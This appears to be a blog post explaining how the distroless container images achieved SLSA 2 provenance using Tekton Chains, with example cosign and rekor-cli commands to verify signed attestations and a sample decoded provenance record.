Provenance is signed with the distroless GCP KMS key

Provenance - Service generated

Provenance is generated by Tekton Chains from a Tekton TaskRun



Achieving SLSA 2 required some changes to the distroless build pipeline: we set up Tekton Pipelines and Tekton Chains in a GKE cluster to automate building images and generating provenance. Every time a pull request is merged to the distroless Github repo, a Tekton Pipeline is triggered. This Pipeline builds the distroless images, and Tekton Chains is responsible for generating signed provenance for each image. Tekton Chains stores the signed provenance alongside the image in an OCI registry and also stores a record of the provenance in the rekor transparency log.

Don't trust us?


You can try the build yourself. Because distroless builds are reproducible, all the information to replicate the build is in the provenance, and you or a trusted third party can build the image yourselves and verify the build is correct by matching image digests.


You can verify an attestation for a distroless image with cosign and the distroless public key:

$ cosign verify-attestation -key cosign.pub gcr.io/distroless/[email protected]:4f8aa0aba190e375a5a53bb71a303c89d9734c817714aeaca9bb23b82135ed91


Verification for gcr.io/distroless/[email protected]:4f8aa0aba190e375a5a53bb71a303c89d9734c817714aeaca9bb23b82135ed91 --

The following checks were performed on each of these signatures:

  - The cosign claims were validated

  - The signatures were verified against the specified public key

  - Any certificates were verified against the Fulcio roots.


...


And you can find the provenance for the image in the rekor transparency log with the rekor-cli tool. For example, you could find the provenance for the above image by using the image’s digest and running:

$ rekor-cli search --sha sha256:4f8aa0aba190e375a5a53bb71a303c89d9734c817714aeaca9bb23b82135ed91


af7a9687d263504ccdb2759169c9903d8760775045c6e7554e365ec2bf29f6f8


$ rekor-cli get --uuid af7a9687d263504ccdb2759169c9903d8760775045c6e7554e365ec2bf29f6f8 --format json | jq -r .Attestation | base64 --decode | jq


{

  "_type": "distroless-provenance",

  "predicateType": "https://tekton.dev/chains/provenance",

  "subject": [

    {

      "name": "gcr.io/distroless/base",

      "digest": {

        "sha256": "703a4726aedc9ec7a7e32251087565246db117bb9a141a7993d1c4bb4036660d"

      }

    },

    {

      "name": "gcr.io/distroless/base",

      "digest": {

        "sha256": "d322ed16d530596c37eee3eb57a039677502aa71f0e4739b0272b1ebd8be9bce"

      }

    },

    {

      "name": "gcr.io/distroless/base",

      "digest": {

        "sha256": "2dfdd5bf591d0da3f67a25f3fc96d929b256d5be3e0af084db10952e5da2c661"

      }

    },

    {

      "name": "gcr.io/distroless/base",

      "digest": {

        "sha256": "4f8aa0aba190e375a5a53bb71a303c89d9734c817714aeaca9bb23b82135ed91"

      }

    },

    {

      "name": "gcr.io/distroless/base",

      "digest": {

        "sha256": "dc0a793d83196a239abf3ba035b3d1a0c7a24184856c2649666e84bc82fc5980"

      }

    },

    {

      "name": "gcr.io/distroless/base-debian10",

      "digest": {

        "sha256": "2dfdd5bf591d0da3f67a25f3fc96d929b256d5be3e0af084db10952e5da2c661"

      }

    },

    {

      "name": "gcr.io/distroless/base-debian10",

      "digest": {

        "sha256": "703a4726aedc9ec7a7e32251087565246db117bb9a141a7993d1c4bb4036660d"

      }

    },

    {

      "name": "gcr.io/distroless/base-debian10",

      "digest": {

        "sha256": "4f8aa0aba190e375a5a53bb71a303c89d9734c817714aeaca9bb23b82135ed91"

      }

    },

    {

      "name": "gcr.io/distroless/base-debian10",

      "digest": {

        "sha256": "d322ed16d530596c37eee3eb57a039677502aa71f0e4739b0272b1ebd8be9bce"

      }

    },

    {

      "name": "gcr.io/distroless/base-debian10",

      "digest": {

        "sha256": "dc0a793d83196a239abf3ba035b3d1a0c7a24184856c2649666e84bc82fc5980"

      }

    },

    {

      "name": "gcr.io/distroless/base-debian11",

      "digest": {

        "sha256": "c9507268813f235b11e63a7ae01526b180c94858bd718d6b4746c9c0e8425f7a"

      }

    },

    {

      "name": "gcr.io/distroless/cc",

      "digest": {

        "sha256": "4af613acf571a1b86b1d3c50682caada0b82024e566c1c4c2fe485a70f3af47d"

      }

    },

    {

      "name": "gcr.io/distroless/cc",

      "digest": {

        "sha256": "2c4bb6b7236db0a55ec54ba8845e4031f5db2be957ac61867872bf42e56c4deb"

      }

    },

    {

      "name": "gcr.io/distroless/cc",

      "digest": {

        "sha256": "2c4bb6b7236db0a55ec54ba8845e4031f5db2be957ac61867872bf42e56c4deb"

      }

    },

    {

      "name": "gcr.io/distroless/cc-debian10",

      "digest": {

        "sha256": "4af613acf571a1b86b1d3c50682caada0b82024e566c1c4c2fe485a70f3af47d"

      }

    },

    {

      "name": "gcr.io/distroless/cc-debian10",

      "digest": {

        "sha256": "2c4bb6b7236db0a55ec54ba8845e4031f5db2be957ac61867872bf42e56c4deb"

      }

    },

    {

      "name": "gcr.io/distroless/cc-debian10",

      "digest": {

        "sha256": "2c4bb6b7236db0a55ec54ba8845e4031f5db2be957ac61867872bf42e56c4deb"

      }

    },

    {

      "name": "gcr.io/distroless/java",

      "digest": {

        "sha256": "deb41661be772c6256194eb1df6b526cc95a6f60e5f5b740dda2769b20778c51"

      }

    },

    {

      "name": "gcr.io/distroless/nodejs",

      "digest": {

        "sha256": "927dd07e7373e1883469c95f4ecb31fe63c3acd104aac1655e15cfa9ae0899bf"

      }

    },

    {

      "name": "gcr.io/distroless/nodejs",

      "digest": {

        "sha256": "927dd07e7373e1883469c95f4ecb31fe63c3acd104aac1655e15cfa9ae0899bf"

      }

    },

    {

      "name": "gcr.io/distroless/nodejs",

      "digest": {

        "sha256": "f106757268ab4e650b032e78df0372a35914ed346c219359b58b3d863ad9fb58"

      }

    },

    {

      "name": "gcr.io/distroless/nodejs-debian10",

      "digest": {

        "sha256": "927dd07e7373e1883469c95f4ecb31fe63c3acd104aac1655e15cfa9ae0899bf"

      }

    },

    {

      "name": "gcr.io/distroless/nodejs-debian10",

      "digest": {

        "sha256": "f106757268ab4e650b032e78df0372a35914ed346c219359b58b3d863ad9fb58"

      }

    },

    {

      "name": "gcr.io/distroless/nodejs-debian10",

      "digest": {

        "sha256": "927dd07e7373e1883469c95f4ecb31fe63c3acd104aac1655e15cfa9ae0899bf"

      }

    },

    {

      "name": "gcr.io/distroless/python3",

      "digest": {

        "sha256": "aa8a0358b2813e8b48a54c7504316c7dcea59d6ae50daa0228847de852c83878"

      }

    },

    {

      "name": "gcr.io/distroless/python3-debian10",

      "digest": {

        "sha256": "aa8a0358b2813e8b48a54c7504316c7dcea59d6ae50daa0228847de852c83878"

      }

    },

    {

      "name": "gcr.io/distroless/static",

      "digest": {

        "sha256": "9acfd1fdf62b26cbd4f3c31422cf1edf3b7b01a9ecee00a499ef8b7e3536914d"

      }

    },

    {

      "name": "gcr.io/distroless/static",

      "digest": {

        "sha256": "e50641dbb871f78831f9aa7ffa59ec8f44d4cc33ae4ee992c9f4b046040e97f2"

      }

    },

    {

      "name": "gcr.io/distroless/static-debian10",

      "digest": {

        "sha256": "9acfd1fdf62b26cbd4f3c31422cf1edf3b7b01a9ecee00a499ef8b7e3536914d"

      }

    },

    {

      "name": "gcr.io/distroless/static-debian10",

      "digest": {

        "sha256": "e50641dbb871f78831f9aa7ffa59ec8f44d4cc33ae4ee992c9f4b046040e97f2"

      }

    }

  ],

  "predicate": {

    "invocation": {

      "parameters": [

        "MANIFEST_SUBSECTION={string 0 []}",

        "CHAINS-GIT_COMMIT={string 976c1c9bc178ac0371d8888d69893145c3df09f0 []}",

        "CHAINS-GIT_URL={string https://github.com/GoogleContainerTools/distroless []}"

      ],

      "recipe_uri": "task://distroless-provenance",

      "event_id": "531c282f-806e-41e4-b3ad-b596c4283381",

      "builder.id": "tekton-chains"

    },

    "recipe": {

      "steps": [

        {

          "entryPoint": "#!/bin/sh\nset -ex\n\n# get the digests for a subset of images built, and store in the IMAGES result\ngo run provenance/provenance.go images $(params.MANIFEST_SUBSECTION) > $(results.IMAGES.path)\n",

          "arguments": null,

          "environment": {

            "container": "provenance",

            "image": "docker.io/library/[email protected]:cb1a7482cb5cfc52527c5cdea5159419292360087d5249e3fe5472f3477be642"

          },

          "annotations": null

        }

      ]

    },

    "metadata": {

      "buildStartedOn": "2021-09-16T00:03:04Z",

      "buildFinishedOn": "2021-09-16T00:04:36Z"

    },

    "materials": [

      {

        "uri": "https://github.com/GoogleContainerTools/distroless",

        "digest": {

          "revision": "976c1c9bc178ac0371d8888d69893145c3df09f0"

        }

      }

    ]

  }

}



As you might guess, our next step is getting distroless to SLSA 3, which will require adding non-falsifiable provenance and isolated builds to the distroless supply chain. Stay tuned for more!